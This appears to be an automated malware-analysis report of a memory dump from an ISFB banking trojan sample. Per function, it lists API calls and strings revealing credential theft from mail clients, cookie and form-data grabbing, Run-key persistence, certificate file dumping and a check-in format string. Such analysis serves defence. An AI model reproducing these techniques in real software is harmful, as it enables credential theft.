Part of subcall function 00B1AC31: RtlAllocateHeap.NTDLL(00000000,?), ref: 00B1AC85
Part of subcall function 00B1AC31: RegQueryValueExA.ADVAPI32(?,Main,00000000,00000000,00000000,?), ref: 00B1ACA0
Part of subcall function 00B1AC31: HeapFree.KERNEL32(00000000,?), ref: 00B1ACBE
Part of subcall function 00B1AC31: RegCloseKey.ADVAPI32(?), ref: 00B1ACC7

WaitForSingleObject.KERNEL32(?,00000000), ref: 00B12293
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 00B122B6
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 00B122D0
SwitchToThread.KERNEL32 ref: 00B122D2
ReleaseMutex.KERNEL32(?), ref: 00B122DC
WaitForSingleObject.KERNEL32(?,00000000), ref: 00B122F1
CloseHandle.KERNEL32(?), ref: 00B1233F
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 00B12353
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 00B1235F
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 00B1236B
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 00B12377
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 00B12383
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 00B1238F
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 00B1239B
RtlExitUserThread.NTDLL(00000000,?,?,?,?,?,?,?), ref: 00B123AA

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Wait$Close$Handle$ObjectSingleTimerWaitable$HeapMultipleObjects$MutexRelease_allmul$FreeThread$AllocateCreateErrorLastOpenQuerySwitchTimeValue$EventExitFileSystemUser
String ID:
API String ID: 3804754466-0
Opcode ID: f06e1f8b41c2279af432471ad248bbe26a5889b37383c8264af9e0ed19534549
Instruction ID: 39eb08053cfc8f6305c745681647bd6f0cde218020a4a558897f708b615c1550
Opcode Fuzzy Hash: f06e1f8b41c2279af432471ad248bbe26a5889b37383c8264af9e0ed19534549
Instruction Fuzzy Hash: F1E19671408345AFD711AF68EC819AFBBE8FB88354F500A6DF5A4931A0DB70DD91CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00B30228, Relevance: 47.6, APIs: 15, Strings: 12, Instructions: 378memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(,00000000,?,?), ref: 00B30280
RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00B3031A
lstrcpyn.KERNEL32(00000000,?,?), ref: 00B3032F
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00B3034B
StrChrA.SHLWAPI(?,00000020,?,?), ref: 00B30426
StrChrA.SHLWAPI(00000001,00000020), ref: 00B30437
lstrlen.KERNEL32(00000000), ref: 00B3044B
memmove.NTDLL(?,?,00000001), ref: 00B3045B
lstrlen.KERNEL32(?,?,?), ref: 00B3047E
RtlAllocateHeap.NTDLL(00000000,?), ref: 00B304A4
memcpy.NTDLL(00000000,?,?), ref: 00B304B8
memcpy.NTDLL(?,?,?), ref: 00B304D8
HeapFree.KERNEL32(00000000,?), ref: 00B30514
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00B305DA
HeapFree.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,00000001), ref: 00B30622

Strings

gzip, deflate, xrefs: 00B30466
ocsp, xrefs: 00B30393
OPTI, xrefs: 00B30262
Accept-Encoding:, xrefs: 00B3046B
POST, xrefs: 00B3025B
OPTI, xrefs: 00B3041B
Content-Type:, xrefs: 00B30386
User-Agent:, xrefs: 00B302F9
GET , xrefs: 00B3024D
, xrefs: 00B3027B, 00B302AC
PUT , xrefs: 00B30254
GET , xrefs: 00B30413

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreelstrlen$memcpy$lstrcpynmemmove
String ID: $ gzip, deflate$Accept-Encoding:$Content-Type:$GET $GET $OPTI$OPTI$POST$PUT $User-Agent:$ocsp
API String ID: 3227826163-537135598
Opcode ID: 097d38a4e09ad22c2f7b33145e211110f2e7974047af4b5914074a2c5f0f1c7f
Instruction ID: a26d81c891cb0ca310d04d7d49aa30347052160ab6aa863109d6f3b9ed92514c
Opcode Fuzzy Hash: 097d38a4e09ad22c2f7b33145e211110f2e7974047af4b5914074a2c5f0f1c7f
Instruction Fuzzy Hash: 4AD13735A10205AFDB15EFA8DC95BAE7BB5FF04300F2441A8F915AB261DB30EE51DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B153D6, Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 284memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 00B1540E
wsprintfA.USER32 ref: 00B15471
wsprintfA.USER32 ref: 00B154BA
wsprintfA.USER32 ref: 00B154DE
lstrcat.KERNEL32(?,726F7426), ref: 00B15518
wsprintfA.USER32 ref: 00B15537
wsprintfA.USER32 ref: 00B15550
wsprintfA.USER32 ref: 00B15574
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00B15591
RtlEnterCriticalSection.NTDLL(05778D20), ref: 00B155B2
RtlLeaveCriticalSection.NTDLL(05778D20), ref: 00B155D2

Part of subcall function 00B2A378: lstrlen.KERNEL32(00000000,00000000,73BB81D0,00000000,?,?,00B34BA0,00000000,05778D60), ref: 00B2A3A3
Part of subcall function 00B2A378: lstrlen.KERNEL32(?,?,?,00B34BA0,00000000,05778D60), ref: 00B2A3AB
Part of subcall function 00B2A378: strcpy.NTDLL ref: 00B2A3C2
Part of subcall function 00B2A378: lstrcat.KERNEL32(00000000,?), ref: 00B2A3CD
Part of subcall function 00B2A378: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00B34BA0,00000000,05778D60), ref: 00B2A3EA

StrTrimA.SHLWAPI(00000000,00B383E4,?,05778D60), ref: 00B15606

Part of subcall function 00B2A587: lstrlen.KERNEL32(?,00000000,73BB81D0,00B34BD7,612E002F,00000000), ref: 00B2A593
Part of subcall function 00B2A587: lstrlen.KERNEL32(?), ref: 00B2A59B
Part of subcall function 00B2A587: lstrcpy.KERNEL32(00000000,?), ref: 00B2A5B2
Part of subcall function 00B2A587: lstrcat.KERNEL32(00000000,?), ref: 00B2A5BD

lstrcpy.KERNEL32(?,00000000), ref: 00B15635
lstrcat.KERNEL32(?,?), ref: 00B15643
lstrcat.KERNEL32(?,?), ref: 00B1564D
RtlEnterCriticalSection.NTDLL(05778D20), ref: 00B15658
RtlLeaveCriticalSection.NTDLL(05778D20), ref: 00B15674

Part of subcall function 00B1F02B: memset.NTDLL ref: 00B1F064
Part of subcall function 00B1F02B: memcpy.NTDLL(?,?,00000090,00000000,00000000,0000009F,0000009F,?,00000090,?), ref: 00B1F070

HeapFree.KERNEL32(00000000,?,?,?,?,05778D60,00000001), ref: 00B1573A
HeapFree.KERNEL32(00000000,?,00B4044E,?), ref: 00B1574C
HeapFree.KERNEL32(00000000,?,?,05778D60), ref: 00B1575E
HeapFree.KERNEL32(00000000,00000000), ref: 00B15770
HeapFree.KERNEL32(00000000,?), ref: 00B15782

Strings

EMPTY, xrefs: 00B153E0
version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s, xrefs: 00B1546B

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Heap$wsprintf$Freelstrcat$CriticalSectionlstrlen$AllocateEnterLeaveTrimlstrcpy$memcpymemsetstrcpy
String ID: EMPTY$version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
API String ID: 1483892062-304588751
Opcode ID: cdc2e6b1b0a0e0ba6eb5abb81f5a700594a657e2e3a5596faf19f3f831bc44cd
Instruction ID: 287870c45b44f536734baa7bc4506842c0fa7c987863bd2d0790e5e5530a385d
Opcode Fuzzy Hash: cdc2e6b1b0a0e0ba6eb5abb81f5a700594a657e2e3a5596faf19f3f831bc44cd
Instruction Fuzzy Hash: 67B19871604201EFDB05DF68EC85EAA7BE9FB88304F24046AF558E72B1DB30E945CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00B34970, Relevance: 39.3, APIs: 26, Instructions: 260memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 00B34991
GetTickCount.KERNEL32 ref: 00B349AB
wsprintfA.USER32 ref: 00B349FE
QueryPerformanceFrequency.KERNEL32(?), ref: 00B34A0A
QueryPerformanceCounter.KERNEL32(?), ref: 00B34A15
_aulldiv.NTDLL(?,?,?,?), ref: 00B34A2B
wsprintfA.USER32 ref: 00B34A41
wsprintfA.USER32 ref: 00B34A5F
wsprintfA.USER32 ref: 00B34A76
wsprintfA.USER32 ref: 00B34A97
wsprintfA.USER32 ref: 00B34AD2
wsprintfA.USER32 ref: 00B34AF6
lstrcat.KERNEL32(?,726F7426), ref: 00B34B2E
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00B34B48
GetTickCount.KERNEL32 ref: 00B34B58
RtlEnterCriticalSection.NTDLL(05778D20), ref: 00B34B6C
RtlLeaveCriticalSection.NTDLL(05778D20), ref: 00B34B8A
StrTrimA.SHLWAPI(00000000,00B383E4,00000000,05778D60), ref: 00B34BBF
lstrcpy.KERNEL32(00000000,00000000), ref: 00B34BEB
lstrcat.KERNEL32(00000000,?), ref: 00B34BF6
lstrcat.KERNEL32(00000000,00000000), ref: 00B34BFA
HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?,?,00000000), ref: 00B34C7B
HeapFree.KERNEL32(00000000,00000000,612E002F,00000000), ref: 00B34C8A
HeapFree.KERNEL32(00000000,00000000,00000000,05778D60), ref: 00B34C99
HeapFree.KERNEL32(00000000,00000000), ref: 00B34CAB
HeapFree.KERNEL32(00000000,?), ref: 00B34CBD

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Heapwsprintf$Free$lstrcat$AllocateCountCriticalPerformanceQuerySectionTick$CounterEnterFrequencyLeaveTrim_aulldivlstrcpy
String ID:
API String ID: 2878544442-0
Opcode ID: 8726a03efc87ceace1b7ebb5f2cf0225708e908ab33e0faffffdfa7c7a7d27e3
Instruction ID: 56bd93f10f4cccffc2ec269f0dd912b1aa4c0542072f8dcfe68245e52b8bb16a
Opcode Fuzzy Hash: 8726a03efc87ceace1b7ebb5f2cf0225708e908ab33e0faffffdfa7c7a7d27e3
Instruction Fuzzy Hash: B1A14571500205AFDB01DFA8ED85FAE3BE9FB48704F240466F908D72A1DB70E959DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00B1CE48, Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 223memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B2672D: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,00B11CDF,00000000,00000000,?,?,00000000,?,?,?,00B11CDF,TorClient), ref: 00B26765
Part of subcall function 00B2672D: RtlAllocateHeap.NTDLL(00000000,00B11CDF), ref: 00B26779
Part of subcall function 00B2672D: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,00B11CDF,?,?,?,00B11CDF,TorClient,?,?), ref: 00B26793
Part of subcall function 00B2672D: RegCloseKey.KERNELBASE(?,?,?,?,00B11CDF,TorClient,?,?), ref: 00B267BD

HeapFree.KERNEL32(00000000,?,LastTask,?,?,73BCF710,00000000,00000000), ref: 00B1CE88
RtlAllocateHeap.NTDLL(00000000,00010000,LastTask), ref: 00B1CEA6
HeapFree.KERNEL32(00000000,00000000,0000011A,00000000,00000000,?,?,?,?,?,?,00B12255), ref: 00B1CED7
HeapFree.KERNEL32(00000000,00B383E4,0000011B,00000000,00000000,00000000,00000000,?,00000001,00B383E4,00000002,?,?), ref: 00B1CF4E
RtlAllocateHeap.NTDLL(00000000,00000400,LastTask), ref: 00B1D013
wsprintfA.USER32 ref: 00B1D027
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00B12255), ref: 00B1D032
HeapFree.KERNEL32(00000000,00000000,0000010D,00000000,00000000,?,?,?,?,?,?,?,?,?,00B12255), ref: 00B1D04C
HeapFree.KERNEL32(00000000,?,LastTask,?,00000008,0000000B,?,?,?,00000001,00000000,?,00000001,00B383E4,00000002,?), ref: 00B1D06E
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 00B1D089
wsprintfA.USER32 ref: 00B1D099
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00B12255), ref: 00B1D0A4

Part of subcall function 00B194B4: lstrlen.KERNEL32(?,00000000,00000000,73B75520,?,?,?,00B11647,0000010D,00000000,00000000), ref: 00B194E4
Part of subcall function 00B194B4: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00B194FA
Part of subcall function 00B194B4: memcpy.NTDLL(00000010,?,00000000,?,?,?,00B11647,0000010D), ref: 00B19530
Part of subcall function 00B194B4: memcpy.NTDLL(00000010,00000000,00B11647,?,?,?,00B11647), ref: 00B1954B
Part of subcall function 00B194B4: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000119,00000001), ref: 00B19569
Part of subcall function 00B194B4: GetLastError.KERNEL32(?,?,?,00B11647), ref: 00B19573
Part of subcall function 00B194B4: HeapFree.KERNEL32(00000000,00000000,?,?,?,00B11647), ref: 00B19599

HeapFree.KERNEL32(00000000,00000000,0000010D,00000000,00000000,?,?,?,?,?,?,?,?,?,00B12255), ref: 00B1D0BE
HeapFree.KERNEL32(00000000,?,?,00000001,00000000,?,00000001,00B383E4,00000002,?,?), ref: 00B1D0CE

Strings

Cmd %u parsing: %u, xrefs: 00B1D093
LastTask, xrefs: 00B1CE5B, 00B1CF8F
Cmd %s processed: %u, xrefs: 00B1D021

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$Allocate$lstrlen$QueryValuememcpywsprintf$CallCloseErrorLastNamedPipe
String ID: Cmd %s processed: %u$Cmd %u parsing: %u$LastTask
API String ID: 3733591251-3332907627
Opcode ID: 4f60e3a0f98dcc7763d3d0b0ce8ce9f07c84ce49ba19de4911865a5a46a95eb9
Instruction ID: 0bc7fc6997a9dfc93672fa196b0f3815709882dc5e77a40f7328abb2dd06bf0e
Opcode Fuzzy Hash: 4f60e3a0f98dcc7763d3d0b0ce8ce9f07c84ce49ba19de4911865a5a46a95eb9
Instruction Fuzzy Hash: FF712D72900219BFDB209FA4DCC8DEEBBBAFB08344F6005A9F505A3160DB715D85CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B2BBD2, Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 129memoryregistrythreadCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 00B2BBED
RtlEnterCriticalSection.NTDLL(00000000), ref: 00B2BC0A
CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 00B2BC5A
DeleteFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00B2BC64
GetLastError.KERNEL32 ref: 00B2BC6E
HeapFree.KERNEL32(00000000,00000000), ref: 00B2BC7F
HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 00B2BCA1
HeapFree.KERNEL32(00000000,?), ref: 00B2BCD8
RtlLeaveCriticalSection.NTDLL(00000000), ref: 00B2BCEC
RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00B2BCF5
SuspendThread.KERNEL32(?), ref: 00B2BD04
CreateEventA.KERNEL32(00B3E0D4,00000001,00000000), ref: 00B2BD18
SetEvent.KERNEL32(00000000), ref: 00B2BD25
CloseHandle.KERNEL32(00000000), ref: 00B2BD2C
Sleep.KERNEL32(000001F4), ref: 00B2BD3F
ResumeThread.KERNEL32(?), ref: 00B2BD63

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00B2BBDE

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: CloseFreeHeap$CriticalEventHandleSectionThread$CreateDeleteEnterErrorFileLastLeaveOpenResumeSleepSuspend
String ID: Software\Microsoft\Windows\CurrentVersion\Run
API String ID: 1011176505-1428018034
Opcode ID: 822ac5610030c5beea9bf35abd1940d56bc4b81e5dff19802ef7b82ddddd7b4c
Instruction ID: 769d7853e2f558c2e80599b3f58de64754a777608452276da7ff9a568507be07
Opcode Fuzzy Hash: 822ac5610030c5beea9bf35abd1940d56bc4b81e5dff19802ef7b82ddddd7b4c
Instruction Fuzzy Hash: 94413C72900219EFDB109FA4FDC8DADBBB9FB04304B2444A9F606A3160DF319D95DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B21D51, Relevance: 29.8, APIs: 9, Strings: 8, Instructions: 85librarymemoryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(WININET.DLL,?,00000000,00000000,?,?), ref: 00B21D6A
TlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B317C0), ref: 00B21D74
LoadLibraryA.KERNEL32(ieframe), ref: 00B21D96
LoadLibraryA.KERNEL32(ieui), ref: 00B21D9D
LoadLibraryA.KERNEL32(mshtml), ref: 00B21DA4
LoadLibraryA.KERNEL32(inetcpl.cpl), ref: 00B21DAB
LoadLibraryA.KERNEL32(ieapfltr), ref: 00B21DB2
LoadLibraryA.KERNEL32(urlmon), ref: 00B21DB9
HeapFree.KERNEL32(00000000,00000000,00000000,?,0000000C,00000000,WININET.dll), ref: 00B21E41

Strings

ieapfltr, xrefs: 00B21DAD
urlmon, xrefs: 00B21DB4
ieframe, xrefs: 00B21D91
inetcpl.cpl, xrefs: 00B21DA6
ieui, xrefs: 00B21D98
mshtml, xrefs: 00B21D9F
WININET.dll, xrefs: 00B21DBB
WININET.DLL, xrefs: 00B21D62

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad$AllocFreeHeap
String ID: WININET.DLL$WININET.dll$ieapfltr$ieframe$ieui$inetcpl.cpl$mshtml$urlmon
API String ID: 356845663-1120705325
Opcode ID: 9d341113096169429c959bd8f1ccc306a315d82612efa8247af671aa7131364c
Instruction ID: 8120322d6ecc07ec3e249b2842b1e88d597dd88ba8071664f4134cabb6e9ec14
Opcode Fuzzy Hash: 9d341113096169429c959bd8f1ccc306a315d82612efa8247af671aa7131364c
Instruction Fuzzy Hash: 4321A770E00218FADB20AFE9ADC6AAD7FE4EB14750F7004F6E51893190CA709D44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B28601, Relevance: 28.2, APIs: 6, Strings: 10, Instructions: 172stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,?,00B40468,Port,?,00B40468,Secure_Connection,?,00B40468,User_Name,?,00B40468,Server,00000000,00000000,00000000), ref: 00B286D9
lstrcpyW.KERNEL32(00000000,00B40724), ref: 00B286F1
lstrcatW.KERNEL32(00000000,00000000), ref: 00B286F9
lstrlenW.KERNEL32(00000000,?,00B40468,Password2,?,00B40468,Port,?,00B40468,Secure_Connection,?,00B40468,User_Name,?,00B40468,Server), ref: 00B2873E
memcpy.NTDLL(00000000,?,?,?), ref: 00B28797
LocalFree.KERNEL32(?,?), ref: 00B287AE

Strings

SMTP, xrefs: 00B28646
HTTPMail, xrefs: 00B28666
IMAP, xrefs: 00B28676
Port, xrefs: 00B286BD
POP3, xrefs: 00B28656
Secure_Connection, xrefs: 00B286AE
User_Name, xrefs: 00B286A2
Server, xrefs: 00B2868B
P, xrefs: 00B2866D
Password2, xrefs: 00B28723

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$FreeLocallstrcatlstrcpymemcpy
String ID: HTTPMail$IMAP$P$POP3$Password2$Port$SMTP$Secure_Connection$Server$User_Name
API String ID: 3649579052-2088458108
Opcode ID: 1fae395d9d6856c15402273da39d3c9c86e9ecda71b1d2eb155305c5982d06d6
Instruction ID: 198d4fe834727d7f23525328ff3b6f8d5b038a0072935fe7de5d6c4dc2585d3f
Opcode Fuzzy Hash: 1fae395d9d6856c15402273da39d3c9c86e9ecda71b1d2eb155305c5982d06d6
Instruction Fuzzy Hash: CF518371901229ABCF11AFA5EC859AFBBF9FF44300F2444A5F614B2261DF748A51DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B15223, Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 156memorystringfileCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 00B1523A
lstrlen.KERNEL32(?), ref: 00B15241
RtlAllocateHeap.NTDLL(00000000,?), ref: 00B15258
lstrcpy.KERNEL32(00000000,?), ref: 00B15269
lstrcat.KERNEL32(?,?), ref: 00B15285
lstrcat.KERNEL32(?,.pfx), ref: 00B1528F
RtlAllocateHeap.NTDLL(00000000,?), ref: 00B152A0
RtlAllocateHeap.NTDLL(00000000,?), ref: 00B15338
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 00B15368
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00B15381
CloseHandle.KERNEL32(00000000), ref: 00B1538B
HeapFree.KERNEL32(00000000,?), ref: 00B1539B
HeapFree.KERNEL32(00000000,00000000), ref: 00B153B6
HeapFree.KERNEL32(00000000,?), ref: 00B153C6

Strings

ISFB, xrefs: 00B1531B, 00B15320, 00B15348
.pfx, xrefs: 00B15287

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFree$Filelstrcatlstrlen$CloseCreateHandleWritelstrcpy
String ID: .pfx$ISFB
API String ID: 333890978-2368466137
Opcode ID: 99ab9bf82f08458b6d23266c6258b28e0abb83e3d3c3c854b488d74d0515c737
Instruction ID: 42e12a18f9e65503bdf1baef014a7347103b72a4a81c7ce1a4033882109c7b46
Opcode Fuzzy Hash: 99ab9bf82f08458b6d23266c6258b28e0abb83e3d3c3c854b488d74d0515c737
Instruction Fuzzy Hash: 97515E76800219FFCB119FA4EC84DAEBBB9FB44394B614065F915E3160DB318E45DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B30669, Relevance: 27.3, APIs: 3, Strings: 15, Instructions: 262memorystringCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,HTTP/1.1 404 Not Found,0000001A,00000000,?,00000000,00B2279E,?,00000000), ref: 00B30718
HeapFree.KERNEL32(00000000,00000008,?,?), ref: 00B308D1
lstrlen.KERNEL32(00000008,00000000), ref: 00B30923

Strings

Cache-Control:, xrefs: 00B3082E
Last-Modified:, xrefs: 00B3083C
chunked, xrefs: 00B308F7
Content-Security-Policy-Report-Only:, xrefs: 00B30860
Content-Length:, xrefs: 00B3090A
X-Frame-Options, xrefs: 00B3086C
gzip, xrefs: 00B307BE
Content-Security-Policy:, xrefs: 00B30854
Access-Control-Allow-Origin:, xrefs: 00B30876, 00B3087B, 00B3088D
Etag:, xrefs: 00B30848
Content-Encoding:, xrefs: 00B307A8, 00B30801
Content-Type:, xrefs: 00B30753
Transfer-Encoding:, xrefs: 00B308FC
HTTP/1.1 404 Not Found, xrefs: 00B30710
no-cache, no-store, must-revalidate, xrefs: 00B30829

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: FreeHeaplstrlenmemcpy
String ID: chunked$Access-Control-Allow-Origin:$Cache-Control:$Content-Encoding:$Content-Length:$Content-Security-Policy-Report-Only:$Content-Security-Policy:$Content-Type:$Etag:$HTTP/1.1 404 Not Found$Last-Modified:$Transfer-Encoding:$X-Frame-Options$gzip$no-cache, no-store, must-revalidate
API String ID: 462153822-754885170
Opcode ID: bce70f8ad86afac80e83b470acdc4b4881730c53633c1aaa32faef9f8733e56d
Instruction ID: f713a42b23ebf0ea54bccbff71652e626c81052dc3ae4530d70b9f9bcbe53d83
Opcode Fuzzy Hash: bce70f8ad86afac80e83b470acdc4b4881730c53633c1aaa32faef9f8733e56d
Instruction Fuzzy Hash: 87A15B71A10212AFDB54AF69C895BAA7BE4FF04710F2141E5FC59AB266D7B0EC40CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00B25BE6, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 174stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(05779608,00000000,00000000,73B75520,?), ref: 00B25C09
lstrlen.KERNEL32(?,00000000,00000000,73B75520,?), ref: 00B25C18
lstrlen.KERNEL32(?,00000000,00000000,73B75520,?), ref: 00B25C25
lstrlen.KERNEL32(00000000,00000000,00000000,73B75520,?), ref: 00B25C3D
lstrlen.KERNEL32(?,00000000,00000000,73B75520,?), ref: 00B25C49
RtlAllocateHeap.NTDLL(00000000,?), ref: 00B25C65
wsprintfA.USER32 ref: 00B25D1D
memcpy.NTDLL(00000000,00004000,?), ref: 00B25D62
InterlockedExchange.KERNEL32(00B3E00C,00000000), ref: 00B25D80
HeapFree.KERNEL32(00000000,00000000), ref: 00B25DC3

Part of subcall function 00B1AA89: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00B1AAB2
Part of subcall function 00B1AA89: memcpy.NTDLL(00000000,?,?), ref: 00B1AAC5
Part of subcall function 00B1AA89: RtlEnterCriticalSection.NTDLL(00B3E268), ref: 00B1AAD6
Part of subcall function 00B1AA89: RtlLeaveCriticalSection.NTDLL(00B3E268), ref: 00B1AAEB
Part of subcall function 00B1AA89: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 00B1AB23

Strings

Accept-Language: , xrefs: 00B25C9D
Referer: , xrefs: 00B25C89
URL: %sREF: %sLANG: %sAGENT: %sCOOKIE: %sPOST: , xrefs: 00B25D48
USER: %s, xrefs: 00B25D17
Cookie: , xrefs: 00B25CB7

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
String ID: Accept-Language: $Cookie: $Referer: $URL: %sREF: %sLANG: %sAGENT: %sCOOKIE: %sPOST: $USER: %s
API String ID: 4198405257-1852062776
Opcode ID: 9c311b085fd7420c4d652c8857ed32faf2e84bd830f7c36ae2b1fbf98d6805a2
Instruction ID: 8747841049e12473f2352d0e5c592524b68ce37801adc85b00cf5676de54bf5c
Opcode Fuzzy Hash: 9c311b085fd7420c4d652c8857ed32faf2e84bd830f7c36ae2b1fbf98d6805a2
Instruction Fuzzy Hash: C3517E71A00619AFCF209FA4EC85FAE7BE9EB04344F2440B9F809E7251DB74DA54CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B171EC, Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 79stringmemoryfileCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,?,?,\sols,\sols,00B16102,?,?,%userprofile%\AppData\Local\,?,00000000,00B123FE), ref: 00B17203
lstrlenW.KERNEL32(\sols,?,00000000,00B123FE), ref: 00B1720E
lstrlenW.KERNEL32(?,?,00000000,00B123FE), ref: 00B17216
RtlAllocateHeap.NTDLL(00000000,?), ref: 00B1722B
lstrcpyW.KERNEL32(00000000,?), ref: 00B1723C
lstrcatW.KERNEL32(00000000,\sols), ref: 00B1724E
CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00B123FE), ref: 00B17253
lstrcatW.KERNEL32(00000000,00B383E0), ref: 00B1725F
lstrcatW.KERNEL32(00000000,?), ref: 00B17267
CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00B123FE), ref: 00B1726C
lstrcatW.KERNEL32(00000000,00B383E0), ref: 00B17278
lstrcatW.KERNEL32(00000000,00000002), ref: 00B17293
CopyFileW.KERNEL32(?,00000000,00000000,?,00000000,00B123FE), ref: 00B1729B
HeapFree.KERNEL32(00000000,00000000,?,00000000,00B123FE), ref: 00B172A9

Strings

\sols, xrefs: 00B171EC, 00B171ED, 00B1720D, 00B1724C

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: lstrcat$lstrlen$CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
String ID: \sols
API String ID: 3635185113-25449109
Opcode ID: 1b0ab9ebe814ca10dbabe230ca20869a72a716551a1aafdfa7a2eb91c5a4df9b
Instruction ID: 23d28a7d42a3d7e0ffe509a1a42e10deb4d0d300278510302539257c577bf475
Opcode Fuzzy Hash: 1b0ab9ebe814ca10dbabe230ca20869a72a716551a1aafdfa7a2eb91c5a4df9b
Instruction Fuzzy Hash: 6A21AE32148315AFD3216B64DC89EAF7BFCEF86B44F210519F50193260DF60A806DAA6

Uniqueness

Uniqueness Score: -1.00%

Function 00B2FAB4, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 146registrystringfileCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000), ref: 00B2FAD8

